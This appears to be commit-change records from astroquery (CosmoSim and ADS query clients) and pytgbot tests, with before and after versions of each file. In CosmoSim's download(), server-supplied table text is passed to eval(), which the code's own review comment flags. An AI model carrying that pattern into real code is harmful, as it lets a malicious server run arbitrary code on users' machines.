    # Start with an empty list so the warning path below cannot hit an
    # unbound variable (NameError in the previous version).
    response_list = []
    if jobid is None:
        completed_jobids = [key for key in self.job_dict.keys() if self.job_dict[key] == 'COMPLETED']
        response_list = [self.session.get(CosmoSim.QUERY_URL+"/{}".format(completed_jobids[i]),auth=(self.username,self.password)) for i in range(len(completed_jobids))]
    elif self.job_dict[jobid] == 'COMPLETED':
        response_list = [self.session.get(CosmoSim.QUERY_URL+"/{}".format(jobid),auth=(self.username,self.password))]
    else:
        logging.warning("JobID must refer to a query with a phase of 'COMPLETED'.")
    if output is True:
        for i in response_list:
            print(i.content)
    else:
        print(response_list)
    return response_list
def delete_job(self,jobid=None,squash=None):
    """
    A public function which deletes a stored job from the server in any phase. If no jobid is given, it attempts to use the most recent job (if it exists in this session). If jobid is specified, then it deletes the corresponding job, and if it happens to match the existing current job, that variable gets deleted.

    Parameters
    ----------
    jobid : string
        The jobid of the sql query. If no jobid is given, it attempts to use the most recent job (if it exists in this session).
    squash : bool
        Suppress the deletion confirmation message.

    Returns
    -------
    result : 'requests.models.Response' object or None
        The DELETE response, or None if nothing could be deleted.
    """
    self.check_all_jobs()
    if not jobid:
        if hasattr(self,'current_job'):
            jobid = self.current_job
        else:
            # Nothing to delete: previously this fell through and raised
            # NameError/KeyError on an unresolved jobid.
            logging.warning("No jobid specified and no job has been run "
                            "in this session.")
            return
    if hasattr(self,'current_job') and jobid == self.current_job:
        del self.current_job
    if self.job_dict[jobid] in ['COMPLETED','ERROR','ABORTED','PENDING']:
        result = self.session.delete(CosmoSim.QUERY_URL+"/{}".format(jobid),auth=(self.username,self.password),data={'follow':''})
    else:
        print("Can only delete a job with phase: 'COMPLETED', 'ERROR', 'ABORTED', or 'PENDING'.")
        return
    if not result.ok:
        result.raise_for_status()
    if squash is None:
        print('Deleted job: {}'.format(jobid))
    return result
def abort_job(self,jobid=None):
    """
    Abort a job. NOT YET IMPLEMENTED — currently only refreshes the job
    dictionary via check_all_jobs().
    """
    self.check_all_jobs()
def delete_all_jobs(self):
    """
    A public function which deletes all jobs from the server in any phase.
    """
    self.check_all_jobs()
    # One DELETE per known jobid; aborts with an HTTPError on failure.
    for key in self.job_dict.keys():
        result = self.session.delete(CosmoSim.QUERY_URL+"/{}".format(key),auth=(self.username,self.password),data={'follow':''})
        if not result.ok:
            result.raise_for_status()
        print("Deleted job: {}".format(key))
    return
def _generate_schema(self):
    """
    Internal function which builds a schema of all simulations within the
    database (in the form of a nested dictionary stored in ``self.db_dict``).
    """
    response = requests.get(CosmoSim.SCHEMA_URL,
                            auth=(self.username,self.password),
                            headers = {'Accept': 'application/json'})
    data = response.json()
    self.db_dict = {}
    # Walk databases -> tables -> columns, mirroring the JSON structure.
    for db in data['databases']:
        db_name = '{}'.format(db['name'])
        db_entry = {
            'id': '{}'.format(db['id']),
            'description': '{}'.format(db['description']),
            'tables': {},
        }
        self.db_dict[db_name] = db_entry
        for tbl in db['tables']:
            tbl_entry = {
                'id': tbl['id'],
                'description': tbl['description'],
                'columns': {},
            }
            db_entry['tables']['{}'.format(tbl['name'])] = tbl_entry
            for column in tbl['columns']:
                tbl_entry['columns']['{}'.format(column['name'])] = {
                    'id': column['id'],
                    'description': column['description'],
                }
    return response
def explore_db(self,db=None,table=None,col=None):
    """
    A public function which allows for the exploration of any simulation and its tables within the database. This function is meant to aid the user in constructing sql queries.

    Parameters
    ----------
    db : string
        The database to explore.
    table : string
        The table to explore.
    col : string
        The column to explore.
    """
    # Build the schema dictionary lazily on first use.
    try:
        self.db_dict
    except AttributeError:
        self._generate_schema()
    if db:
        if table:
            if col:
                # db + table + col: print every attribute of one column.
                print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
                print("@ {}".format("tables"))
                print(" @ {}".format(table))
                print(" "*6 + "@ {}".format("columns"))
                print(" "*9 + "@ {}".format('{}'.format(col)))
                for i in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)]['columns']['{}'.format(col)].keys():
                    print(" "*12 + "--> {}:{}".format(i,self.db_dict['{}'.format(db)]['tables']['{}'.format(table)]['columns']['{}'.format(col)][i]))
            else:
                # db + table: print table attributes and its column names.
                print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
                print("@ {}".format("tables"))
                print(" @ {}".format(table))
                for i in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)].keys():
                    if type(self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i]) == dict:
                        print(" "*6 + "@ {}".format(i))
                        for j in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i].keys():
                            print(" "*9 + "--> {}".format(j))
                    else:
                        print(" "*6 + "$ {}".format(i))
                        print(" "*9 + "--> {}".format(self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i]))
        else:
            # db only: print database attributes and its table names.
            print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
            for i in self.db_dict['{}'.format(db)].keys():
                if type(self.db_dict['{}'.format(db)][i]) == dict:
                    print("@ {}".format(i))
                    for j in self.db_dict['{}'.format(db)][i].keys():
                        print(" --> {}".format(j))
                else:
                    print("$ {}".format(i))
                    print(" --> {}".format(self.db_dict['{}'.format(db)][i]))
    else:
        # No database given: list the available databases.
        print("Must choose a database to explore:")
        for i in self.db_dict.keys():
            print(" ## " + "{}".format(i))
    return
def download(self,jobid=None,filename=None,format=None):
    """
    A public function to download data from a job with COMPLETED phase.

    Keyword Args
    ------------
    jobid :
        Completed jobid to be downloaded
    filename : string
        If left blank, downloaded to the terminal. If specified, data is written out to file (directory can be included here).
    format : string
        'VOTable'/'votable' returns or writes a VOTable; 'FITS' is not yet
        implemented. If None, the parsed headers/data are returned or raw
        CSV is streamed to ``filename``.

    Returns
    -------
    headers, data : list, list
    """
    if not jobid:
        try:
            jobid = self.current_job
        except:
            raise
    self.check_all_jobs()
    completed_job_responses = self.completed_job_info(jobid)
    soup = BeautifulSoup(completed_job_responses[0].content)
    tableurl = soup.find("uws:result").get("xlink:href")
    # This is where the request.content parsing happens
    # NOTE(review): assumes ``.content`` is text (Python 2 str); under
    # Python 3 these splits need ``.text`` — confirm target version.
    raw_table_data = self.session.get(tableurl,auth=(self.username,self.password))
    raw_headers = raw_table_data.content.split('\n')[0]
    num_cols = len(raw_headers.split(','))
    num_rows = len(raw_table_data.content.split('\n'))-2
    headers = [raw_headers.split(',')[i].strip('"') for i in range(num_cols)]
    raw_data = [raw_table_data.content.split('\n')[i+1].split(",") for i in range(num_rows)]
    # SECURITY NOTE(review): eval() on server-provided cell text executes
    # arbitrary code if the response is malicious; ast.literal_eval would
    # be the safe replacement.
    data = [map(eval,raw_data[i]) for i in range(num_rows)]
    if format:
        tbl = Table(data=map(list, zip(*data)),names=headers)
        if format in ['VOTable','votable']:
            votbl = votable.from_table(tbl)
            if not filename:
                return votbl
            else:
                if '.xml' in filename:
                    filename = filename.split('.')[0]
                votable.writeto(votbl, "{}.xml".format(filename))
                print("Data written to file: {}.xml".format(filename))
        elif format in ['FITS','fits']:
            print("Need to implement...")
    else:
        if not filename:
            return headers, data
        else:
            # Re-request with streaming and write the raw bytes to disk.
            with open(filename, 'wb') as fh:
                raw_table_data = self.session.get(tableurl,auth=(self.username,self.password),stream=True)
                for block in raw_table_data.iter_content(1024):
                    if not block:
                        break
                    fh.write(block)
                print("Data written to file: {}".format(filename))
    return headers, data
def _check_phase(self,jobid):
    """
    Internal helper returning the phase string (e.g. 'COMPLETED') of the
    given job, or None if the jobid is unknown.

    Parameters
    ----------
    jobid : string
        The jobid of the sql query.
    """
    self._existing_tables()
    if jobid not in self.job_dict:
        # Fixed typo in the log message: "doctionary" -> "dictionary".
        logging.error("Job not present in job dictionary.")
        return
    else:
        phase = self.job_dict['{}'.format(jobid)]
        return phase
Fixed up the logout() function such that it checks for username/password attributes. Also gave it a hard logout option which deletes the password from the keychain. Created a check_login_status() function which provides the user with information about the success or failure of their login attempt.
from __future__ import print_function
import requests
import sys
from bs4 import BeautifulSoup
import keyring
import getpass
import logging
import threading
import ipdb
# Astropy imports
from astropy.table import Table
import astropy.units as u
import astropy.coordinates as coord
import astropy.io.votable as votable
from astropy.io import fits
from astropy.io import votable
import astropy.utils.data as aud
# Astroquery imports
from ..utils import commons
from ..query import QueryWithLogin
from . import conf
__all__ = ['CosmoSim']
class CosmoSim(QueryWithLogin):
    """Query interface for the CosmoSim database (www.cosmosim.org)."""

    # Endpoints and defaults come from the astroquery configuration.
    QUERY_URL = conf.query_url
    SCHEMA_URL = conf.schema_url
    TIMEOUT = conf.timeout

    def __init__(self):
        super(CosmoSim, self).__init__()
        # Fresh HTTP session; replaced again on login.
        self.session = requests.session()
def _login(self, username, password=None):
    """
    Authenticate against www.cosmosim.org.

    Parameters
    ----------
    username : string
        CosmoSim.org account name.
    password : string
        Account password. If None, the password is taken from the keyring
        or prompted for interactively.

    Returns
    -------
    authenticated : 'requests.models.Response' object
        The response of the authentication POST request.
    """
    self.session = requests.session()
    self.username = username
    # Get password from keyring or prompt
    password_from_keyring = keyring.get_password("astroquery:www.cosmosim.org", self.username)
    if password_from_keyring is None:
        logging.warning("No password was found in the keychain for the provided username.")
        # Check if running from script or interactive python session
        import __main__ as main
        # For script
        if hasattr(main,'__file__'):
            assert password, "No password provided."
            self.password = password
        # For interactive session
        else:
            self.password = getpass.getpass("{0}, enter your CosmoSim password:\n".format(self.username))
    else:
        self.password = password_from_keyring
    # Authenticate
    print("Authenticating {0} on www.cosmosim.org...".format(self.username))
    authenticated = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password))
    if authenticated.status_code == 200:
        print("Authentication successful!")
    elif authenticated.status_code == 401:
        print("Authentication failed!")
    elif authenticated.status_code == 503:
        print("Service Temporarily Unavailable...")
    # Generating dictionary of existing tables
    self._existing_tables()
    # Store the password only after a successful authentication.
    if authenticated.status_code == 200 and password_from_keyring is None:
        keyring.set_password("astroquery:www.cosmosim.org", self.username, self.password)
    # Delete the dummy job created as a side effect of the POST above.
    soup = BeautifulSoup(authenticated.content)
    self.delete_job(jobid="{}".format(soup.find("uws:jobid").string),squash=True)
    return authenticated
def logout(self,hard=True):
    """
    Public function which allows the user to logout of their cosmosim credentials.

    Parameters
    ----------
    hard : bool
        A hard logout - delete the password to the associated username from the keychain. The default is True.

    Returns
    -------
    None
    """
    if hasattr(self,'username') and hasattr(self,'password') and hasattr(self,'session'):
        if hard is True:
            # NOTE(review): keyring.delete_password raises if no entry
            # exists for this username — confirm this is intended.
            keyring.delete_password("astroquery:www.cosmosim.org", self.username)
            print("Removed password for {} in the keychain.".format(self.username))
        del self.session
        del self.username
        del self.password
    else:
        logging.error("You must log in before attempting to logout.")
def check_login_status(self):
    """
    Public function which checks the status of a user login attempt.

    Prints whether the stored credentials still authenticate successfully
    against the server.
    """
    if hasattr(self,'username') and hasattr(self,'password') and hasattr(self,'session'):
        # Re-POST with the stored credentials; 200 means still valid.
        authenticated = self.session.post(CosmoSim.QUERY_URL,auth=(self.username,self.password))
        if authenticated.status_code == 200:
            print("Status: You are logged in as {}.".format(self.username))
        else:
            logging.warning("Status: The username/password combination for {} appears to be incorrect.".format(self.username))
            print("Please re-attempt to login with your cosmosim credentials.")
    else:
        print("Status: You are not logged in.")
def run_sql_query(self, query_string, tablename=None, queue=None):
    """
    Public function which sends a POST request containing the sql query string.

    Parameters
    ----------
    query_string : string
        The sql query to be sent to the CosmoSim.org server.
    tablename : string
        The name of the table for which the query data will be stored under. If left blank or if it already exists, one will be generated automatically.
    queue : string
        Server queue to submit to; defaults to 'short'.

    Returns
    -------
    result : jobid
        The jobid of the query
    """
    self._existing_tables()
    if not queue:
        queue = 'short'
    payload = {'query': query_string, 'phase': 'run', 'queue': queue}
    name_taken = tablename in self.table_dict.values()
    if tablename is not None and not name_taken:
        # A fresh, unused table name can be passed straight through;
        # otherwise the server is left to generate one.
        payload['table'] = '{}'.format(tablename)
    result = self.session.post(CosmoSim.QUERY_URL, auth=(self.username, self.password), data=payload)
    soup = BeautifulSoup(result.content)
    if name_taken:
        gen_tablename = str(soup.find(id="table").string)
        logging.warning("Table name {} is already taken.".format(tablename))
        print("Generated table name: {}".format(gen_tablename))
    self.current_job = str(soup.find("uws:jobid").string)
    print("Job created: {}".format(self.current_job))
    self._existing_tables()
    return self.current_job
def _existing_tables(self):
    """
    Internal function which rebuilds ``self.table_dict``: a mapping from
    the jobids of running/finished jobs to the tables stored under them.
    """
    checkalljobs = self.check_all_jobs()
    # Only jobs that finished or are still running can own a table.
    active_jobs = [jid for jid in self.job_dict.keys()
                   if self.job_dict[jid] in ['COMPLETED', 'EXECUTING']]
    soup = BeautifulSoup(checkalljobs.content)
    self.table_dict = {}
    for ref in soup.find_all("uws:jobref"):
        ref_jobid = ref.get('xlink:href').split('/')[-1]
        if ref_jobid in active_jobs:
            self.table_dict[ref_jobid] = '{}'.format(ref.get('id'))
def check_query_status(self,jobid=None):
    """
    A public function which sends an http GET request for a given jobid, and checks the server status. If no jobid is provided, it uses the most recent query (if one exists).

    Parameters
    ----------
    jobid : string
        The jobid of the sql query. If no jobid is given, it attempts to use the most recent job (if it exists in this session).

    Returns
    -------
    result : content of 'requests.models.Response' object
        The requests response phase

    Raises
    ------
    AttributeError
        If no jobid is given and no query has been run in this session.
    """
    if jobid is None:
        # Replaces a dead try/except that re-raised a message-less
        # AttributeError: fail fast with an explanatory message instead.
        if not hasattr(self, 'current_job'):
            raise AttributeError("No jobid given and no job has been run "
                                 "in this session.")
        jobid = self.current_job
    response = self.session.get(CosmoSim.QUERY_URL+'/{}'.format(jobid)+'/phase',auth=(self.username,self.password),data={'print':'b'})
    print("Job {}: {}".format(jobid,response.content))
    return response.content
def check_all_jobs(self):
    """
    Public function which rebuilds ``self.job_dict``, mapping each jobid
    belonging to the current credentials to its phase status
    (e.g. EXECUTING, COMPLETED, PENDING, ERROR).

    Returns
    -------
    checkalljobs : 'requests.models.Response' object
        The requests response for the GET request for finding all existing jobs.
    """
    checkalljobs = self.session.get(CosmoSim.QUERY_URL,auth=(self.username,self.password),params={'print':'b'})
    soup = BeautifulSoup(checkalljobs.content)
    self.job_dict = {}
    for ref in soup.find_all("uws:jobref"):
        phase = str(ref.find('uws:phase').string)
        # Finished/active jobs are keyed by the jobid from the xlink URL;
        # other phases fall back to the element id attribute.
        if phase in ['COMPLETED', 'EXECUTING', 'ABORTED', 'ERROR']:
            key = ref.get('xlink:href').split('/')[-1]
        else:
            key = ref.get('id')
        self.job_dict['{}'.format(key)] = phase
    # Peek at the caller's name so that internal bookkeeping calls do not
    # print the whole job dictionary to the terminal.
    quiet_callers = ['completed_job_info', 'delete_all_jobs',
                     '_existing_tables', 'delete_job', 'download']
    if sys._getframe(1).f_code.co_name not in quiet_callers:
        print(self.job_dict)
    return checkalljobs
def completed_job_info(self,jobid=None,output=False):
    """
    A public function which sends an http GET request for a given jobid with phase COMPLETED, and returns a list containing the response object. If no jobid is provided, a list of all responses with phase COMPLETED is generated.

    Parameters
    ----------
    jobid : string
        The jobid of the sql query.
    output : bool
        Print output of response(s) to the terminal

    Returns
    -------
    result : list
        A list of response object(s); empty if the given jobid is not in
        the COMPLETED phase.
    """
    self.check_all_jobs()
    # Start with an empty list so the warning path below cannot hit an
    # unbound variable (NameError in the previous version).
    response_list = []
    if jobid is None:
        completed_jobids = [key for key in self.job_dict.keys() if self.job_dict[key] == 'COMPLETED']
        response_list = [self.session.get(CosmoSim.QUERY_URL+"/{}".format(completed_jobids[i]),auth=(self.username,self.password)) for i in range(len(completed_jobids))]
    elif self.job_dict[jobid] == 'COMPLETED':
        response_list = [self.session.get(CosmoSim.QUERY_URL+"/{}".format(jobid),auth=(self.username,self.password))]
    else:
        logging.warning("JobID must refer to a query with a phase of 'COMPLETED'.")
    if output is True:
        for i in response_list:
            print(i.content)
    else:
        print(response_list)
    return response_list
def delete_job(self,jobid=None,squash=None):
    """
    A public function which deletes a stored job from the server in any phase. If no jobid is given, it attempts to use the most recent job (if it exists in this session). If jobid is specified, then it deletes the corresponding job, and if it happens to match the existing current job, that variable gets deleted.

    Parameters
    ----------
    jobid : string
        The jobid of the sql query. If no jobid is given, it attempts to use the most recent job (if it exists in this session).
    squash : bool
        Suppress the deletion confirmation message.

    Returns
    -------
    result : 'requests.models.Response' object or None
        The DELETE response, or None if nothing could be deleted.
    """
    self.check_all_jobs()
    if not jobid:
        if hasattr(self,'current_job'):
            jobid = self.current_job
        else:
            # Nothing to delete: previously this fell through and raised
            # NameError/KeyError on an unresolved jobid.
            logging.warning("No jobid specified and no job has been run "
                            "in this session.")
            return
    if hasattr(self,'current_job') and jobid == self.current_job:
        del self.current_job
    if self.job_dict[jobid] in ['COMPLETED','ERROR','ABORTED','PENDING']:
        result = self.session.delete(CosmoSim.QUERY_URL+"/{}".format(jobid),auth=(self.username,self.password),data={'follow':''})
    else:
        print("Can only delete a job with phase: 'COMPLETED', 'ERROR', 'ABORTED', or 'PENDING'.")
        return
    if not result.ok:
        result.raise_for_status()
    if squash is None:
        print('Deleted job: {}'.format(jobid))
    return result
def abort_job(self,jobid=None):
    """
    Abort a job. NOT YET IMPLEMENTED — currently only refreshes the job
    dictionary via check_all_jobs().
    """
    self.check_all_jobs()
def delete_all_jobs(self):
    """
    A public function which deletes all jobs from the server in any phase.
    """
    self.check_all_jobs()
    # One DELETE per known jobid; abort with an HTTPError on failure.
    for jobid in self.job_dict.keys():
        resp = self.session.delete(CosmoSim.QUERY_URL+"/{}".format(jobid),auth=(self.username,self.password),data={'follow':''})
        if not resp.ok:
            resp.raise_for_status()
        print("Deleted job: {}".format(jobid))
    return
def _generate_schema(self):
    """
    Internal function which builds a schema of all simulations within the
    database (in the form of a nested dictionary stored in ``self.db_dict``).
    """
    response = requests.get(CosmoSim.SCHEMA_URL,
                            auth=(self.username,self.password),
                            headers = {'Accept': 'application/json'})
    data = response.json()
    self.db_dict = {}
    # Walk databases -> tables -> columns, mirroring the JSON structure.
    for db in data['databases']:
        db_name = '{}'.format(db['name'])
        db_entry = {
            'id': '{}'.format(db['id']),
            'description': '{}'.format(db['description']),
            'tables': {},
        }
        self.db_dict[db_name] = db_entry
        for tbl in db['tables']:
            tbl_entry = {
                'id': tbl['id'],
                'description': tbl['description'],
                'columns': {},
            }
            db_entry['tables']['{}'.format(tbl['name'])] = tbl_entry
            for column in tbl['columns']:
                tbl_entry['columns']['{}'.format(column['name'])] = {
                    'id': column['id'],
                    'description': column['description'],
                }
    return response
def explore_db(self,db=None,table=None,col=None):
    """
    A public function which allows for the exploration of any simulation and its tables within the database. This function is meant to aid the user in constructing sql queries.

    Parameters
    ----------
    db : string
        The database to explore.
    table : string
        The table to explore.
    col : string
        The column to explore.
    """
    # Build the schema dictionary lazily on first use.
    try:
        self.db_dict
    except AttributeError:
        self._generate_schema()
    if db:
        if table:
            if col:
                # db + table + col: print every attribute of one column.
                print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
                print("@ {}".format("tables"))
                print(" @ {}".format(table))
                print(" "*6 + "@ {}".format("columns"))
                print(" "*9 + "@ {}".format('{}'.format(col)))
                for i in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)]['columns']['{}'.format(col)].keys():
                    print(" "*12 + "--> {}:{}".format(i,self.db_dict['{}'.format(db)]['tables']['{}'.format(table)]['columns']['{}'.format(col)][i]))
            else:
                # db + table: print table attributes and its column names.
                print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
                print("@ {}".format("tables"))
                print(" @ {}".format(table))
                for i in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)].keys():
                    if type(self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i]) == dict:
                        print(" "*6 + "@ {}".format(i))
                        for j in self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i].keys():
                            print(" "*9 + "--> {}".format(j))
                    else:
                        print(" "*6 + "$ {}".format(i))
                        print(" "*9 + "--> {}".format(self.db_dict['{}'.format(db)]['tables']['{}'.format(table)][i]))
        else:
            # db only: print database attributes and its table names.
            print("#"*(len(db)+4) + "\n# {} #\n".format(db) + "#"*(len(db)+4))
            for i in self.db_dict['{}'.format(db)].keys():
                if type(self.db_dict['{}'.format(db)][i]) == dict:
                    print("@ {}".format(i))
                    for j in self.db_dict['{}'.format(db)][i].keys():
                        print(" --> {}".format(j))
                else:
                    print("$ {}".format(i))
                    print(" --> {}".format(self.db_dict['{}'.format(db)][i]))
    else:
        # No database given: list the available databases.
        print("Must choose a database to explore:")
        for i in self.db_dict.keys():
            print(" ## " + "{}".format(i))
    return
def download(self,jobid=None,filename=None,format=None):
    """
    A public function to download data from a job with COMPLETED phase.

    Keyword Args
    ------------
    jobid :
        Completed jobid to be downloaded
    filename : string
        If left blank, downloaded to the terminal. If specified, data is written out to file (directory can be included here).
    format : string
        'VOTable'/'votable' returns or writes a VOTable; 'FITS' is not yet
        implemented. If None, the parsed headers/data are returned or raw
        CSV is streamed to ``filename``.

    Returns
    -------
    headers, data : list, list
    """
    if not jobid:
        try:
            jobid = self.current_job
        except:
            raise
    self.check_all_jobs()
    completed_job_responses = self.completed_job_info(jobid)
    soup = BeautifulSoup(completed_job_responses[0].content)
    tableurl = soup.find("uws:result").get("xlink:href")
    # This is where the request.content parsing happens
    # NOTE(review): assumes ``.content`` is text (Python 2 str); under
    # Python 3 these splits need ``.text`` — confirm target version.
    raw_table_data = self.session.get(tableurl,auth=(self.username,self.password))
    raw_headers = raw_table_data.content.split('\n')[0]
    num_cols = len(raw_headers.split(','))
    num_rows = len(raw_table_data.content.split('\n'))-2
    headers = [raw_headers.split(',')[i].strip('"') for i in range(num_cols)]
    raw_data = [raw_table_data.content.split('\n')[i+1].split(",") for i in range(num_rows)]
    # SECURITY NOTE(review): eval() on server-provided cell text executes
    # arbitrary code if the response is malicious; ast.literal_eval would
    # be the safe replacement.
    data = [map(eval,raw_data[i]) for i in range(num_rows)]
    if format:
        tbl = Table(data=map(list, zip(*data)),names=headers)
        if format in ['VOTable','votable']:
            votbl = votable.from_table(tbl)
            if not filename:
                return votbl
            else:
                if '.xml' in filename:
                    filename = filename.split('.')[0]
                votable.writeto(votbl, "{}.xml".format(filename))
                print("Data written to file: {}.xml".format(filename))
        elif format in ['FITS','fits']:
            print("Need to implement...")
    else:
        if not filename:
            return headers, data
        else:
            # Re-request with streaming and write the raw bytes to disk.
            with open(filename, 'wb') as fh:
                raw_table_data = self.session.get(tableurl,auth=(self.username,self.password),stream=True)
                for block in raw_table_data.iter_content(1024):
                    if not block:
                        break
                    fh.write(block)
                print("Data written to file: {}".format(filename))
    return headers, data
def _check_phase(self,jobid):
    """
    Internal helper returning the phase string (e.g. 'COMPLETED') of the
    given job, or None if the jobid is unknown.

    Parameters
    ----------
    jobid : string
        The jobid of the sql query.
    """
    self._existing_tables()
    if jobid not in self.job_dict:
        # Fixed typo in the log message: "doctionary" -> "dictionary".
        logging.error("Job not present in job dictionary.")
        return
    else:
        phase = self.job_dict['{}'.format(jobid)]
        return phase
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from unittest import TestCase
from luckydonaldUtils.logger import logging
from pytgbot.api_types.receivable.updates import Update, Message
__author__ = 'luckydonald'
logger = logging.getLogger(__name__)

if __name__ == '__main__':
    # Enable verbose colored logging when the tests are run directly.
    logging.add_colored_handler(level=logging.DEBUG)
# end if
class TestUpdate(TestCase):
    def test_1(self):
        """A minimal update (only update_id) round-trips through from_array/to_array."""
        data = {
            "update_id": 1234,
        }
        update = Update.from_array(data)
        self.assertEqual(1234, update.update_id)
        optional_fields = (
            "message", "callback_query", "inline_query", "channel_post",
            "chosen_inline_result", "edited_channel_post", "poll",
            "pre_checkout_query", "shipping_query",
        )
        for field in optional_fields:
            self.assertIsNone(getattr(update, field), "element should be not set")
        for field in optional_fields:
            self.assertNotIn(field, update, "__contains__ should be false as well")
        new = Update(update_id=1234)
        self.assertEqual(data, new.to_array(), 'to_array()')
    # end def
class TestMessage(TestCase):
    def test_1(self):
        """A private-chat /start message round-trips through from_array/to_array."""
        chat_data = {
            "id": 1111101,
            "type": "private",
            "first_name": "Alfred",
            "last_name": "Alfons",
        }
        user_data = {
            "id": 1111101,
            "first_name": "Alfred",
            "last_name": "Alfons",
            "is_bot": False,
        }
        data = {
            "date": 1441645532,
            "chat": chat_data,
            "message_id": 1365,
            "from": user_data,
            "text": "/start",
        }
        msg = Message.from_array(data)
        self.assertEqual(1441645532, msg.date)
        from pytgbot.api_types.receivable.peer import Chat, User
        new = Message(
            message_id=1365, date=1441645532,
            chat=Chat(id=1111101, type="private", first_name="Alfred", last_name="Alfons"),
            from_peer=User(id=1111101, first_name="Alfred", last_name="Alfons", is_bot=False),
            text="/start",
        )
        self.assertEqual(data, new.to_array(), 'to_array()')
    # end def
# end class
Should implement the compare function at some point.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from unittest import TestCase
from luckydonaldUtils.logger import logging
from pytgbot.api_types.receivable.updates import Update, Message
__author__ = 'luckydonald'
logger = logging.getLogger(__name__)

if __name__ == '__main__':
    # Enable verbose colored logging when the tests are run directly.
    logging.add_colored_handler(level=logging.DEBUG)
# end if
class TestUpdate(TestCase):
    def test_1(self):
        """A minimal update (only update_id) round-trips through from_array/to_array."""
        data = {
            "update_id": 1234,
        }
        update = Update.from_array(data)
        self.assertEqual(1234, update.update_id)
        optional_fields = (
            "message", "callback_query", "inline_query", "channel_post",
            "chosen_inline_result", "edited_channel_post", "poll",
            "pre_checkout_query", "shipping_query",
        )
        for field in optional_fields:
            self.assertIsNone(getattr(update, field), "element should be not set")
        for field in optional_fields:
            self.assertNotIn(field, update, "__contains__ should be false as well")
        new = Update(update_id=1234)
        self.assertEqual(data, new.to_array(), 'to_array()')
        # TODO: direct dict comparison once Update implements __eq__:
        # self.assertEqual(data, update, 'compare')
    # end def
class TestMessage(TestCase):
    def test_1(self):
        """A private-chat /start message round-trips through from_array/to_array."""
        chat_data = {
            "id": 1111101,
            "type": "private",
            "first_name": "Alfred",
            "last_name": "Alfons",
        }
        user_data = {
            "id": 1111101,
            "first_name": "Alfred",
            "last_name": "Alfons",
            "is_bot": False,
        }
        data = {
            "date": 1441645532,
            "chat": chat_data,
            "message_id": 1365,
            "from": user_data,
            "text": "/start",
        }
        msg = Message.from_array(data)
        self.assertEqual(1441645532, msg.date)
        from pytgbot.api_types.receivable.peer import Chat, User
        new = Message(
            message_id=1365, date=1441645532,
            chat=Chat(id=1111101, type="private", first_name="Alfred", last_name="Alfons"),
            from_peer=User(id=1111101, first_name="Alfred", last_name="Alfons", is_bot=False),
            text="/start",
        )
        self.assertEqual(data, new.to_array(), 'to_array()')
        # TODO: direct dict comparison once Message implements __eq__:
        # self.assertEqual(data, msg, 'compare')
    # end def
# end class
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Module to search the SAO/NASA Astrophysics Data System
:author: Magnus Persson <magnusp@vilhelm.nu>
"""
import os
from astropy.table import Table
from astropy.extern.six.moves.urllib.parse import quote as urlencode
from ..query import BaseQuery
from ..utils import async_to_sync
from ..utils.class_or_instance import class_or_instance
from .utils import _get_data_from_xml
from . import conf
from xml.dom import minidom
__all__ = ['ADS', 'ADSClass']
@async_to_sync
class ADSClass(BaseQuery):
    """Query interface for the SAO/NASA Astrophysics Data System (ADS)."""

    SERVER = conf.server
    QUERY_SIMPLE_PATH = conf.simple_path
    TIMEOUT = conf.timeout
    ADS_FIELDS = conf.adsfields
    NROWS = conf.nrows
    NSTART = conf.nstart
    TOKEN = conf.token

    QUERY_SIMPLE_URL = SERVER + QUERY_SIMPLE_PATH

    def __init__(self, *args):
        """ set some parameters """
        super(ADSClass, self).__init__()

    @class_or_instance
    def query_simple(self, query_string, get_query_payload=False,
                     get_raw_response=False, cache=True):
        """
        Basic query. Uses a string and the ADS generic query.

        Parameters
        ----------
        query_string : str
            Free-form ADS query string.
        get_query_payload : bool
            If True, return the request URL instead of performing the query.
        get_raw_response : bool
            If True, return the raw ``requests`` response object.
        cache : bool
            Whether to cache the HTTP response.
        """
        request_string = self._args_to_url(query_string)
        request_fields = self._fields_to_url()
        request_rows = self._rows_to_url(self.NROWS, self.NSTART)
        request_url = self.QUERY_SIMPLE_URL + request_string + request_fields + request_rows
        # primarily for debug purposes, but also useful if you want to send
        # someone a URL linking directly to the data
        if get_query_payload:
            return request_url
        headers = {'Authorization': 'Bearer ' + self._get_token()}
        response = self._request(method='GET', url=request_url,
                                 headers=headers, timeout=self.TIMEOUT,
                                 cache=cache)
        response.raise_for_status()
        if get_raw_response:
            return response
        # parse the XML response into AstroPy Table
        resulttable = self._parse_response(response.json())
        return resulttable

    def _parse_response(self, response):
        """Convert the JSON payload of an ADS response into an astropy Table.

        Raises ``RuntimeError`` when the query matched no documents.
        """
        try:
            response['response']['docs'][0]['bibcode']
        except IndexError:
            raise RuntimeError('No results returned!')
        # get the list of hits
        hitlist = response['response']['docs']
        t = Table()
        # Grab the various fields and put into AstroPy table
        for field in self.ADS_FIELDS:
            tmp = _get_data_from_xml(hitlist, field)
            t[field] = tmp
        return t

    def _args_to_url(self, query_string):
        # convert arguments to a valid requests payload
        # i.e. a dictionary
        request_string = 'q=' + urlencode(query_string)
        return request_string

    def _fields_to_url(self):
        # comma-separated list of fields to request
        request_fields = '&fl=' + ','.join(self.ADS_FIELDS)
        return request_fields

    def _rows_to_url(self, nrows=10, nstart=0):
        # paging parameters: number of rows and starting offset
        request_rows = '&rows=' + str(nrows) + '&start=' + str(nstart)
        return request_rows

    def _get_token(self):
        """
        Try to get token from the places Andy Casey's python ADS client expects it, otherwise return an error
        """
        if self.TOKEN is not None:
            return self.TOKEN
